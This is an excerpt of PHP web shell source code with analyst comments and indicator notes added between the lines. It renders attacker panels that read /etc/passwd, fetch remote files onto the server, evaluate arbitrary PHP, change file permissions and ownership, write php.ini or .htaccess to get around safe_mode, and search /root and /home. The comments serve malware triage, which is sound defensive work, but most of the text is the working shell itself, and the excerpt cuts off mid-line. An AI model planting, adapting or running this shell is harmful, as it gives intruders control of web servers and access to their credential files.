4784 echo sr(15,"<b>".$lang[$language.'_text205'].$arrow."</b>",in('text','log',96,(!empty($_POST['log'])?($_POST['log']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'?? ??? ???? ???????? ???????? filename.php?ss=http://shell.txt?').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
4785 echo $te.'</div>'.$table_end1.$fe;
// Two directory-oriented panels: field `glob` with cmd=glob and field `root`
// with cmd=root, both pre-filled with /etc/.
4786 echo $fs.$table_up1.div_title($lang[$language.'_text207'],'id3').$table_up2.div('id3').$ts;
4787 echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','glob',85,'/etc/').in('hidden','cmd',0,'glob').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
4788 echo $te.'</div>'.$table_end1.$fe;
4789 echo $fs.$table_up1.div_title($lang[$language.'_text209'],'id3').$table_up2.div('id3').$ts;
4790 echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','root',85,'/etc/').in('hidden','cmd',0,'root').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
4791 echo $te.'</div>'.$table_end1.$fe;
// Panel "id11": field `zend` (default /etc/passwd, re-filled from $_POST)
// with cmd=zend. An extra <table> is opened here with no matching close in
// this block.
4792 echo $fs.$table_up1.div_title($lang[$language.'_text210'],'id11').$table_up2.div('id11').$ts;
4793 echo "<table class=table1 width=100% align=center>";
4794 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','zend',85,(!empty($_POST['zend'])?($_POST['zend']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'zend').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4795 echo $te.'</div>'.$table_end1.$fe;
// Panel "id21": three name fields — php_ini1 ("php.ini"), htacces
// ("htaccess") and file_ini ("ini.php") — each with its own submit button and
// no hidden `cmd` selector. Presumably the dispatcher keys on the field names
// and writes a configuration file of that name; confirm against the handler.
// Triage note: unexpected php.ini, .htaccess or ini.php files appearing in a
// web root are worth checking with file-integrity monitoring.
4796 echo $table_up1.div_title($lang[$language.'_text211'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
4797 echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text212']."</div></b></font>";
4798 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','php_ini1',10,'php.ini').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
4799 echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text213']."</div></b></font>";
4800 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','htacces',10,'htaccess').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
4801 echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text218']."</div></b></font>";
4802 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','file_ini',10,'ini.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
4803 echo $te.'</div>'.$table_end1.$fe;
// Archive panel: fields `funzip` (default "$dir/file") and `fzip` (default
// "$dir/sploitz.zip"); no hidden `cmd` selector is emitted.
4804 echo $fs.$table_up1.div_title($lang[$language.'_text221'],'id15').$table_up2.div('id15').$ts;
4805 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>",in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','funzip',78,"$dir/file"));
4806 echo sr(15,"<b>".$lang[$language.'_text65'].$arrow."</b>",in('text','fzip',105,"$dir/sploitz.zip").ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
4807 echo $te.'</div>'.$table_end1.$fe;
// Remote-fetch panel: `filefrom` (default http://website.com/file.txt) and
// `fileto`. The `fileto` default is the unquoted expression filename_.php,
// i.e. two bare constants joined with `.`; that relies on legacy PHP's
// bare-word fallback and is an Error on PHP 8.
// Triage note: outbound HTTP from the PHP worker shortly after a POST with
// filefrom/fileto is the network-side indicator for this panel.
4808 echo $fs.$table_up1.div_title($lang[$language.'_text219'],'id15').$table_up2.div('id15').$ts;
4809 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>",in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','filefrom',78,'http://website.com/file.txt'));
4810 echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('text','fileto',105,filename_.php).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
4811 echo $te.'</div>'.$table_end1.$fe;
// Build the <option> list for the alias picker from the keys of $aliases
// (defined outside this excerpt); only the names are used, the mapped
// commands ($alias_cmd) are ignored here. Names are interpolated unescaped.
4812 $aliases2 = '';
4813 foreach ($aliases as $alias_name=>$alias_cmd)
4814  {
4815  $aliases2 .= "<option>$alias_name</option>";
4816  }
// Panel "id6": posts the chosen `alias` with the hidden `dir`; no `cmd` field.
4817 echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
4818 echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
4819 echo $te.'</div>'.$table_end1.$fe;
4820 }
// Rendered only when $safe_mode is truthy. The file assigns $safe_mode from
// ini_get('safe_mode') near its top (assuming no later reassignment); PHP
// removed that directive in 5.4, so on current runtimes this panel is not
// expected to appear.
// Panel "id4": create/delete form. Posts mk_name (re-filled from $_POST, else
// "new_name"), `action` (create | delete), `what` (file | dir) and the hidden
// selector cmd=mk. The handler is outside this excerpt.
4821 if($safe_mode){
4822 echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
4823 echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
4824 echo $te.'</div>'.$table_end1.$fe;
4825 }
// Rendered only when both $safe_mode and $unix are truthy ($unix is set
// outside this excerpt — presumably a platform check; confirm).
// Panel "id5": ownership/permission form. Posts `what` (mod | own | grp, shown
// as CHMOD/CHOWN/CHGRP), param1 (default "filename"), param2 (default "0777")
// and the hidden selector cmd=ch_. The handler is outside this excerpt.
// Two quirks visible here: the previous values are tested with a plain
// truthiness check on $_POST['param1'] / $_POST['param2'] rather than
// empty(), and the title attribute of param2 is smuggled in through the
// field-name argument of in() ('param2 title="..."').
4826 if($safe_mode && $unix){
4827 echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
4828 echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
4829 echo $te.'</div>'.$table_end1.$fe;
4830 }
// Everything down to the matching closing brace is rendered only when
// $safe_mode is truthy (the file assigns it from ini_get('safe_mode') near
// its top; PHP removed that directive in 5.4).
4831 if($safe_mode){
// Panel "id7": text search. Posts s_text, s_dir (default $dir), s_mask
// (default ".txt;.php"), a checkbox emitted through in() with the name
// argument 'm id=m', and the hidden selector cmd=search_text.
4832 echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
4833 echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
4834 echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
4835 echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
4836 echo $te.'</div>'.$table_end1.$fe;
// NOTE(review): this condition requires !$safe_mode while nested inside
// if($safe_mode), and $safe_mode is not reassigned in between, so the
// "id8" panel (cmd=find_text) below is unreachable as written.
4837 if(!$safe_mode && $unix){
4838 echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
4839 echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
4840 echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
4841 echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
4842 echo $te.'</div>'.$table_end1.$fe;
4843 }
// Panel "id9": a textarea named php_eval posted with the hidden selector
// cmd=php_eval; the name suggests the handler evaluates the text as PHP, but
// that handler is outside this excerpt.
// The textarea content is $_POST['php_eval'] echoed back with no HTML
// escaping, so the panel reflects request data verbatim — open captured
// samples only in an isolated environment.
// Triage note: the default text names the file sniper_sa.php; that filename
// and the php_eval parameter are both usable as indicators when sweeping a
// web root or request logs.
4844 echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
4845 echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
4846 echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"sniper_sa.php\");\r\n//readfile(\"/etc/passwd\");"));
4847 echo "</textarea>";
4848 echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
4849 echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
4850 echo "</div></div></font>";
4851 echo $table_end1.$fe;
// Panel "id10": shown only when $curl_on is also truthy ($curl_on is set
// outside this excerpt). Posts test1_file (default /etc/passwd, re-filled
// from $_POST) with cmd=test1.
4852 if($safe_mode&&$curl_on)
4853 {
4854 echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
4855 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4856 echo $te.'</div>'.$table_end1.$fe;
4857 }
4858 }
// Rendered only when $safe_mode is truthy (assigned from
// ini_get('safe_mode') near the top of the file; the directive no longer
// exists from PHP 5.4 on).
// Panel "id11": posts test2_file (default /etc/passwd, re-filled from $_POST)
// with the hidden selector cmd=test2. The handler is outside this excerpt.
// The element id "id11" is also used by the `zend` panel earlier in the
// file, and the extra <table> opened here has no matching close in this block.
4859 if($safe_mode)
4860 {
4861 echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
4862 echo "<table class=table1 width=100% align=center>";
4863 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4864 echo $te.'</div>'.$table_end1.$fe;
4865 }
4866 
4867 if($safe_mode&&$mssql_on)
4868 {
4869 echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
4870 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])